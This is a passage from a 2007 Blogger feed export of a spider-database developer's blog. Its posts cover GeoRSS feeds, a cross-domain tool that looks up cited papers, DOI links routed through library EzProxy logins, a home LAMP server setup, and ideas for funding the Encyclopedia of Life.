href="http://georss.org/"&gt;GeoRSS&lt;/a&gt; feeds from The Nearctic Spider Database and Spider WebWatch. Of note, you can paste a GeoRSS feed URL into Google Maps to get an instant mash-up. Since Google just released an &lt;a href="http://code.google.com/apis/ajaxfeeds/"&gt;AJAX Feed API&lt;/a&gt;, I thought I'd give it a shot in this blog. Here's a feed from the 10 most recent Spider WebWatch posts where contributors uploaded images with their observations:&lt;br /&gt;&lt;br /&gt;&lt;div id="slideshow" class="gss"&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;What I'd really like to see now is for &lt;a href="http://www.opensearch.org/Home"&gt;OpenSearch&lt;/a&gt; to adopt these extensions such that 3rd party, client-run search engines like &lt;a href="http://www.wrensoft.com/zoom/"&gt;ZoomSearch&lt;/a&gt; start incorporating this stuff.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8950331493240735674?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8950331493240735674/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8950331493240735674' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8950331493240735674'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8950331493240735674'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/fun-with-rss.html' title='Fun With RSS'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-2538133288527051610</id><published>2007-06-01T09:54:00.000-06:00</published><updated>2007-10-06T14:38:49.522-06:00</updated><title type='text'>Gimme That Scientific Paper!</title><content type='html'>&lt;a href="http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s1600-h/bioGUID48.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s320/bioGUID48.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5071130508956195602" /&gt;&lt;/a&gt;&lt;br /&gt;What irks me about references cited on web pages is that you can't directly get the PDF or at least immediately search for it unless the page author has explicitly put a link to that paper. When a page author has taken the time to construct these links, they often point to a 404 (page doesn't exist) because the link is no longer working. In the digital age, surely this sort of thing can be done more effectively. Well, thanks to Rod Page who has developed a reference parsing tool in his bioGUID suite of applications, this functionality along with some nifty Flash-based, cross-domain AJAX that I used, is now possible. For a taste of this, have a peek at the references page in &lt;a href="http://www.canadianarachnology.org/data/canada_spiders/AllReferences.asp"&gt;The Nearctic Spider Database&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;Now, what the heck is going on here? Glad you asked.&lt;br /&gt;&lt;br /&gt;The chain of events I think is very cool.&lt;br /&gt;&lt;br /&gt;First, I simply wrap individual references in uniquely identified and sequentially numbered identifiers and put a "holding" span at the end of these with similarly identified span elements:&lt;br /&gt;&lt;br /&gt;&amp;lt;p&amp;gt;&amp;lt;span id=&amp;quot;bioGUIDref_1&amp;quot;&amp;gt;This is the first full reference.&amp;lt;/span&amp;gt; &amp;lt;span id=&amp;quot;bioGUIDres_1&amp;quot;&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/p&amp;gt;&lt;br /&gt;&lt;br /&gt;That's pretty easy for anyone with a rudimentary knowledge of HTML.&lt;br /&gt;&lt;br /&gt;Second, I put a reference to a JavaScript in the page header whose functions initialize when the page finishes loading. That script counts all the references with the simple mark-up shown above and puts little search icons in the holding spans. Of course this script can be hosted elsewhere and anyone can put it in their page headers.&lt;br /&gt;&lt;br /&gt;Third, I put this mark-up at the bottom of the page that initializes a Flash item, which coordinates some cross-domain search functions via Rod's reference parsing API (more on that below):&lt;br /&gt;&lt;br /&gt;&amp;lt;script type=&amp;quot;text/javascript&amp;quot;&amp;gt;FlashHelper.writeFlash();&amp;lt;/script&amp;gt;&lt;br /&gt;&lt;br /&gt;So, for the end user seeing a list of references with these little search icons &lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt; stuck at the end of each of them as such:&lt;br /&gt;&lt;br /&gt;Agnarsson, I. 2004. Morphological phylogeny of cobweb spiders and their relatives (Araneae, Araneoidea, Theridiidae). &lt;em&gt;Zool. J. Linnean Soc.&lt;/em&gt; &lt;b&gt;141:&lt;/b&gt; 447-626. &lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt;&lt;br /&gt;&lt;br /&gt;...it's a simple matter of clicking each in turn to perform a real-time search for individual papers of interest [Disclaimer: of course the above example doesn't work here in this blog post]. If the paper is found somewhere in the ether, the icon changes either to &lt;img src="http://www.canadianarachnology.org/bioGUID/page_white_acrobat.png" style="border:0px;height:16px;width:16px" alt=""&gt; in the case of a freely available PDF (yay!), &lt;img src="http://www.canadianarachnology.org/bioGUID/world_go.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the paper can be found via other means (subscription may be required), &lt;img src="http://www.canadianarachnology.org/bioGUID/error.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the reference was successfully parsed and searched but nothing was found, or &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; if the reference was not successfully parsed and consequently a search couldn't effectively be constructed.&lt;br /&gt;&lt;br /&gt;The really awesome part of this whole system is that it is laughably easy for anyone with a basic knowledge of HTML (no complex coding required!) to duplicate these functions on their authored web pages. But let's first have some background on how this works.&lt;br /&gt;&lt;br /&gt;This cross-domain AJAX querying system uses Flash. Julien Couvreur worked with Jason Levitt (from Yahoo) to create an XMLHTTP transport that uses Flash. You can read about this in Julien's blog, &lt;a href="http://blog.monstuff.com/archives/000294.html"&gt;Curosity is Bliss&lt;/a&gt;, where he also has a nice demo that produces search results from Yahoo's ImageSearch API using this technique. What Rod had to do was first get his &lt;a href="http://bioguid.info/references"&gt;reference parsing script&lt;/a&gt; to produce XML and also had to create a simple &lt;a href="http://www.crossdomainxml.org/"&gt;crossdomain.xml&lt;/a&gt; document and dump it in the root folder for his domain. Julien points out a potential security issue with these Flash-based cross-domain search queries so Rod at the moment only has The Canadian Arachnologists' domain in his crossdomain.xml document.&lt;br /&gt;&lt;br /&gt;An end user clicking &lt;img src="http://www.canadianarachnology.org/bioGUID/magnifier.png" style="border:0px;height:16px;width:16px" alt=""&gt; initiates a cross-domain request to Rod's machine. The reference is parsed in Rod's Perl script (&lt;em&gt;i.e.&lt;/em&gt; split-up into Author, Year, Title, Publication, Pages, etc. as required for &lt;a href="http://en.wikipedia.org/wiki/OpenURL"&gt;OpenURL&lt;/a&gt;) then sent off to &lt;a href="http://www.crossref.org/"&gt;CrossRef&lt;/a&gt; and elsewhere to obtain search results. This system works fantastically well for modern publications that have bought into CrossRef's DOI system (note: &lt;a href="http://hdl.handle.net/"&gt;handles&lt;/a&gt; are also working in Rod's Perl scripting) but what about all those scientific societies that produce online PDFs but haven't bought into DOI's?&lt;br /&gt;&lt;br /&gt;For smaller societies and publications like the &lt;a href="http://www.americanarachnology.org/JOA_online.html"&gt;Journal of Arachnology&lt;/a&gt;, Rod unfortunately must scrape the URLs to their digital reprints. [Aside: JoA does have DOIs, but these are issued from BioOne and an end-user accessing JoA articles via BioOne would of course be presented with a pay-per-view screen - sucky] In these cases then, the XMLHTTP system I have that sends citations to Rod's machine might return an erroneous link to a PDF if the source URL was changed &amp; Rod hadn't yet updated his listings. But, as long as societies agree not to mess with their URL structure, the conduit to their PDFs remains viable. This is most certainly something &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; can coordinate.&lt;br /&gt;&lt;br /&gt;Here then is a very slick little system that is easy for web page authors to implement and intuitively obvious for end-users. A potential pitfall worth mentioning is poorly constructed citations. Rod's algorithms that split a citation into is constituent bits are only as good as what goes in. In other words at my end for example, if a &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon is returned to the end-user, a digital version of the paper might exist somewhere - I just didn't construct my citation well enough for Rod's algorithm to split the bits into an OpenURL format. So, I am contemplating adding a &lt;img src="http://www.canadianarachnology.org/bioGUID/email.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon to sit alongside the &lt;img src="http://www.canadianarachnology.org/bioGUID/delete.png" style="border:0px;height:16px;width:16px" alt=""&gt; icon such that an end-user who knows the paper can be found online can send me a quick note/poke to tell me that I need to re-write the citation.&lt;br /&gt;&lt;br /&gt;If you want some background on what Rod did at his end, head over to his blog where he wrote about OpenURL &lt;a href="http://iphylo.blogspot.com/2007/05/amnh-dspace-and-openurl.html"&gt;Here&lt;/a&gt; &amp; &lt;a href="http://iphylo.blogspot.com/2007/05/openurl-and-spiders.html"&gt;Here&lt;/a&gt;.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-2538133288527051610?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/2538133288527051610/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=2538133288527051610' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2538133288527051610'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/2538133288527051610'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/06/gimme-that-scientific-paper.html' title='Gimme That Scientific Paper!'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VYUFlXOCOxE/RmBGVHP62xI/AAAAAAAAAA0/rhnouiQKL1U/s72-c/bioGUID48.png' height='72' width='72'/><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-139649991330502979</id><published>2007-05-25T00:55:00.000-06:00</published><updated>2007-05-27T12:20:01.191-06:00</updated><title type='text'>DOI + EzProxy</title><content type='html'>I spent a few hours yesterday learning how to do a few rudimentary things in Perl. My goal was to create something useful with all the references in The Nearctic Spider Database. It's nice to have a list of papers on the species pages I host, but is this really useful to anyone? I'd much rather have a direct link to download the paper than to see a reference list, which is fundamentally useless to me. Because DOIs and resolving services like &lt;a href="http://www.crossref.org"&gt;CrossRef&lt;/a&gt; have become popular now, I thought I'd at least add "PDF" icons for the relatively recent articles such that you &lt;em&gt;can&lt;/em&gt; download the paper. This is why I have been trying to learn Perl, which has a few really cool modules to parse references into their constituent, &lt;a href="http://en.wikipedia.org/wiki/OpenURL"&gt;openURL&lt;/a&gt; structure.&lt;br /&gt;&lt;br /&gt;Here's what you can do with DOIs &amp; why they're cool:&lt;br /&gt;&lt;br /&gt;Ingi Agnarsson published a massive and thorough paper in the Zoological Journal of the Linnean Society entitled, "A revision of the New World &lt;em&gt;eximius&lt;/em&gt; lineage of &lt;em&gt;Anelosimus&lt;/em&gt; (Araneae, Theridiidae) and a phylogenetic analysis using worldwide exemplars". The full reference is:&lt;br /&gt;&lt;br /&gt;Agnarsson, I. 2006. A revision of the New World &lt;em&gt;eximius&lt;/em&gt; lineage of &lt;em&gt;Anelosimus&lt;/em&gt; (Araneae, Theridiidae) and a phylogenetic analysis using worldwide exemplars. &lt;em&gt;Zool. J. Linn. Soc.&lt;/em&gt; &lt;strong&gt;146:&lt;/strong&gt; 453-593.&lt;br /&gt;&lt;br /&gt;That paper has the doi 10.1111/j.1096-3642.2006.00213.x and I store this value in the Nearctic Spider Database's references table exactly like that because it is persistent. This doi can be slapped behind http://dx.doi.org/ to give you &lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt;. Now there's a ready-made, direct link to Ingi's paper right from the Nearctic Spider Database and I never have to worry about a dead link. But, there's a catch. It's a copyrighted paper so you have to log on to Blackwell Synergy's web site (somehow) to actually retrieve the full PDF and not just look at the nice title and abstract. If you happen to be on your institution's network, your library system is fully integrated into your internal network, and you library subscribes to the resource, then you can directly access the PDF. But what if you're using a computer at home or your institution hasn't fully integrated their library systems (requiring authentication), are we any better off with DOIs? For the end user, not really.&lt;br /&gt;&lt;br /&gt;However, in an &lt;a href="http://ispiders.blogspot.com/2007/05/monetizing-encyclopedia-of-life.html"&gt;earlier post&lt;/a&gt; where I tried to think about how &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; might generate a steady flow of income, I mentioned the use of EzProxy. Now my ideas have finally gelled.&lt;br /&gt;&lt;br /&gt;To make the PDF links in The Nearctic Spider Database really work for remote users (i.e. working at home) who belong to an institution whose library subscribes to the Zoological Journal of the Linnean Society, I'd like to be able to dynamically rewrite &lt;a href="http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt; to &lt;a href="http://login.ezproxy.library.ualberta.ca/login?url=http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x"&gt;http://login.ezproxy.library.ualberta.ca/login?url=http://dx.doi.org/10.1111/j.1096-3642.2006.00213.x&lt;/a&gt; as is the case for the University of Albera. Clicking that link will of course take you to the U of A library login screen prior to redirecting you to the publisher's page. Via that one minor login hiccup on your institution's library page, you can then download Ingi's paper. So how do you rewrite the URL on-the-fly? &lt;em&gt;&lt;strong&gt;A cookie!&lt;/strong&gt;&lt;/em&gt; Recipe: read member's cookie...find institution's EzProxy base URL stored there...change the doi URL. Simple as that. Alternatively, the EzProxy base URL could be stored in a table in the server's database in the event an institution changes its EzProxy settings. You probably wouldn't want frutrated users trying to get things to work with a half-baked cookie in their cache. But (there's always a but), it would be quite unreasonable for me to store all these EzProxy base URLs in The Nearctic Spider Database. If there was a web service I could use that maintained such lists, then I would most certainly use it. I have no money, but The Encyclopedia of Life does! Folks leading EoL are searching for a way to encourage systematists to vet species pages, so here's a really nice way to give something in return: direct links to PDF downloads. The subscription fee charged to institutions would be to maintain working EzProxy base URLs (or similar base proxy URLs to coordinate this) in the EoL database. Now that would be cool.&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Post Update&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Apparently, I haven't been the only one thinking about these sorts of remote authentication issues. There's a blog called "&lt;a href="http://distlib.blogs.com"&gt;The Distant Librarian&lt;/a&gt;" where these exact same ideas have been kicked around, though with use in Google Scholar (&lt;a href="http://distlib.blogs.com/distlib/2004/11/how_to_make_goo.html"&gt;1&lt;/a&gt;,&lt;a href="http://distlib.blogs.com/distlib/2004/11/google_scholar__1.html"&gt;2&lt;/a&gt;)...same principle. So, it appears that The Encyclopedia of Life can be added to institutions EzProxy config to allow direct links to the PDF downloads. Also of interest is &lt;a href="http://rsinger.library.gatech.edu/localizer/localizer.html"&gt;WAG the Dog PHP localizer&lt;/a&gt; (also available on &lt;a href="http://sourceforge.net/projects/gslocal/"&gt;SourceForge&lt;/a&gt;). Wouldn't you know it, Peter Binkley was one of the developers of WAG. He's a librarian at my own institution! I'll have to go have a coffee with him.&lt;br /&gt;&lt;br /&gt;I also discovered a FireFox extension under development by a number of libraries called &lt;a href="http://www.libx.org/"&gt;LibX&lt;/a&gt;, which does magic, client-side URL re-writing for DOIs, has Google Scholar integration, &amp; works with EzProxy. Now all we need is buy-in by all libraries for this &amp; for IE/Safari folks to use FF. If you absolutely can't wait for librarians in your institution to make a LibX FF extension, you can probably kludge together an approximation of its functionality using &lt;a href="https://addons.mozilla.org/en-US/firefox/addon/748"&gt;Greasemonkey&lt;/a&gt; and Jesse Ruderman's &lt;a href="http://www.squarefree.com/2005/05/22/autolink/"&gt;autolink script&lt;/a&gt;, which you can adjust (if you're familiar with regexp) to suit the way DOIs are typically presented on web sites.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-139649991330502979?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/139649991330502979/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=139649991330502979' title='6 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/139649991330502979'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/139649991330502979'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/doi-ezproxy.html' title='DOI + EzProxy'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>6</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6293775234949201106</id><published>2007-05-23T23:43:00.000-06:00</published><updated>2007-05-24T00:15:06.385-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='humour'/><title type='text'>How to Present Your First Paper at a Scientific Conference</title><content type='html'>&lt;object width="425" height="350"&gt;&lt;param name="movie" value="http://www.youtube.com/v/yL_-1d9OSdk"&gt;&lt;/param&gt;&lt;param name="wmode" value="transparent"&gt;&lt;/param&gt;&lt;embed src="http://www.youtube.com/v/yL_-1d9OSdk" type="application/x-shockwave-flash" wmode="transparent" width="425" height="350"&gt;&lt;/embed&gt;&lt;/object&gt;&lt;br /&gt;&lt;br /&gt;Still chicken?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6293775234949201106?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6293775234949201106/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6293775234949201106' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6293775234949201106'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6293775234949201106'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/how-to-present-your-first-paper-at.html' title='How to Present Your First Paper at a Scientific Conference'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-6761060476915894225</id><published>2007-05-23T22:22:00.000-06:00</published><updated>2007-05-23T23:14:22.196-06:00</updated><title type='text'>The Headless, Household Server</title><content type='html'>&lt;a href="http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s1600-h/ubuntulogo.png"&gt;&lt;img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s320/ubuntulogo.png" border="0" alt=""id="BLOGGER_PHOTO_ID_5067986196973969842" /&gt;&lt;/a&gt;&lt;br /&gt;Many of you are aware that The Nearctic Spider Database and all the other goodies I have been fussing with are hosted off a machine in my basement. I presented its design and capabilities at the last &lt;a href="http://www-museum.unl.edu/research/entomology/ECN/Meeting.htm"&gt;ECN meeting&lt;/a&gt; in Indianapolis, IN. The student with a server in his basement drew a few chides and chuckles, but I suspect it made many stop &amp; think. A few in attendance were wary of such a home-grown project. Back-ups? Theft? Damage? Flood? These same issues are faced by web hosting companies. As long as you have a reasonable solution to all these (e.g. scheduled and off-site storage of back-ups), and you periodically have a look at your web logs to assess traffic and bandwidth such that your Internet service provider doesn't pull the plug on you, what's the big deal? Databases and websites are portable. It would take perhaps an hour to remotely transfer the whole she-bang to another machine. What I also hope transpired from that meeting is an understanding that this stuff doesn't require rocket science and a massive team of database and web engineers. Just a bit of time and patience. So, this post is an introduction to a do-it-yourself, headless (no monitor), household server. If you have a ton of images and data that you haven't figured out what to do with, what are you waiting for?&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Hardware&lt;/strong&gt;: Any old PC will do so long is it has a reasonable amount of oomph and you can jam it full of memory. There are lots of local Mom &amp; Pop computer stores that will sell you a brand new PC for less than $500. Remember, you don't need an Operating System (more below) and you don't need a monitor...you'll just need to borrow one for the initial install. What you do need though are: 1) a good, name-brand power supply unit, 2) a bare-bones, read-only CD-ROM, 3) a quiet case with good ventilation, 4) minimum of 2GB RAM, 5) A 2.4GHz processor or more (too much more is just a waste of energy), 6) a motherboard with onboard network connection &amp; video, and 7) a couple of hard drives (size depends on your needs).&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;Software&lt;/strong&gt;: &lt;a href="http://www.ubuntu.com/getubuntu/download"&gt;Ubuntu Server Edition&lt;/a&gt; for a fully-functioning LAMP install as a free download that you can burn to CD. LAMP = Linux, Apache, MySQL database, and PHP for programmtic delivery of web pages. The &lt;a href="http://ubuntuforums.org/"&gt;Ubuntu community&lt;/a&gt; is very active and can help troubleshoot issues you may have with installation. With a reasonably well configured machine (cutting edge hardware is best avoided and unnecessary), you ought to be able to get a bare-bones LAMP install, ready for data import in an hour or so.&lt;br /&gt;&lt;br /&gt;What you also need is a hardware router and a home Internet service provider that is reasonably lax when it comes to hosting stuff on their pipes. Some purposefully block Port TCP 80, the channel web traffic travels on, but many others recognize the stiff competition out there for customers and consequently, turn a blind eye. Since your home Internet protocol address might very well be dynamically-assigned, you can make use of free services liks &lt;a href="http://www.dyndns.com/"&gt;DynDNS&lt;/a&gt; &amp; configure your router to automatically send an update to this service should your provider assign you a new IP.&lt;br /&gt;&lt;br /&gt;There's more to it than this of course (i.e. database development, web page design and delivery &amp; remote access from another PC on your home network), but these are the basics. If you want a visual step-by-step, Falko Timme has a &lt;a href="http://www.howtoforge.com/perfect_setup_ubuntu704"&gt;nice article&lt;/a&gt; on howtoforge.com.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-6761060476915894225?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/6761060476915894225/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=6761060476915894225' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6761060476915894225'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/6761060476915894225'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/headless-household-server.html' title='The Headless, Household Server'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://3.bp.blogspot.com/_VYUFlXOCOxE/RlUamEU3YbI/AAAAAAAAAAs/u8MK6cXlMMY/s72-c/ubuntulogo.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-8716835674818070241</id><published>2007-05-18T22:25:00.001-06:00</published><updated>2007-05-18T22:50:28.798-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Remixing the Web II</title><content type='html'>I wondered when Microsoft would enter the visual mashup IDE world. With &lt;a href="http://pipes.yahoo.com"&gt;Yahoo Pipes&lt;/a&gt;, &lt;a href="http://www.zude.com"&gt;Zude&lt;/a&gt; and similar projects, Microsoft has jumped in and is making great use of its cross-platform / cross-browser &lt;a href="http://www.microsoft.com/silverlight/"&gt;Silverlight&lt;/a&gt; plugin within a visual mashup interface they are calling &lt;a href="http://www.popfly.com/"&gt;Popfly&lt;/a&gt;. Google, where are you on this front? I had my reservations at first, but I am now thoroughly convinced that a MyEoL within The &lt;a href="http://www.eol.org"&gt;Enyclopedia of Life&lt;/a&gt; is well within reach. What remains is intelligent and simple use of these technologies while maintaining accreditation for contributions.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-8716835674818070241?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/8716835674818070241/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=8716835674818070241' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8716835674818070241'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/8716835674818070241'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/remixing-web-ii.html' title='Remixing the Web II'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7072791551940055483</id><published>2007-05-17T18:22:00.001-06:00</published><updated>2007-05-18T22:51:11.932-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Monetizing the Encyclopedia of Life</title><content type='html'>First, let me preface this post by saying I know next to nothing of library informatics or politics. However, I have been chewing on an idea that may help monetize &lt;a href="http://www.eol.org"&gt;The Encyclopedia of Life&lt;/a&gt; in an acceptable fashion, thus bulding a long term flow of income to help build this great resource.&lt;br /&gt;&lt;br /&gt;While remotely using my institution's library to hunt for PDF reprints, it occured to me that EoL ought to negotiate using &lt;a href="http://names.mbl.edu/rss/"&gt;uBioRSS&lt;/a&gt; as a database similar in functionality to the largescale, educational databases like BioOne. My University uses EzProxy to coordinate logon by students to access library resources, which essentially means that remote sessions appear local. So, accessing a PDF from a publisher once authenticated through my library's system is quick and easy. In very simplistic (and admittedly naive terms), "login.ezproxy.library.ualberta.ca" for example gets tagged onto the suffix of the publisher's domain to coordinate this pass-through authentication. Couldn't the uBioRSS service be rolled into EoL along with a reasonable subscription fee for institutions such that students and employees can directly access PDF reprints right off the species pages in EoL? The majority of the content on species pages in EoL would of course still be fully open access, it's merely the direct links to copyrighted PDF downloads that would require prior authentication from within an institution. It would be absurd to charge institutions the typical BioOne-type subscription fees, but why not a reasonable fee that helps offset the EoL staffing and infrastructure costs?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5846783121665026448-7072791551940055483?l=ispiders.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://ispiders.blogspot.com/feeds/7072791551940055483/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=5846783121665026448&amp;postID=7072791551940055483' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7072791551940055483'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5846783121665026448/posts/default/7072791551940055483'/><link rel='alternate' type='text/html' href='http://ispiders.blogspot.com/2007/05/monetizing-encyclopedia-of-life.html' title='Monetizing the Encyclopedia of Life'/><author><name>David Shorthouse</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_VYUFlXOCOxE/SxG2s72j8XI/AAAAAAAAAI8/mLUSWrUceaQ/S220/david.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-5846783121665026448.post-7311182378608605549</id><published>2007-05-17T13:59:00.000-06:00</published><updated>2007-05-18T22:51:24.912-06:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='EoL'/><title type='text'>Remixing the Web</title><content type='html'>&lt;a href="http://4.bp.blogspot.com/_VYUFlXOCOxE/Rky1hkU3YaI/AAAAAAAAAAk/Pb-dUzXyqe0/s1600-h/logo_zude.gif"&gt;&lt;img style="float:left; margin:0 10px 10px 0;cursor:pointer; cursor:hand;" 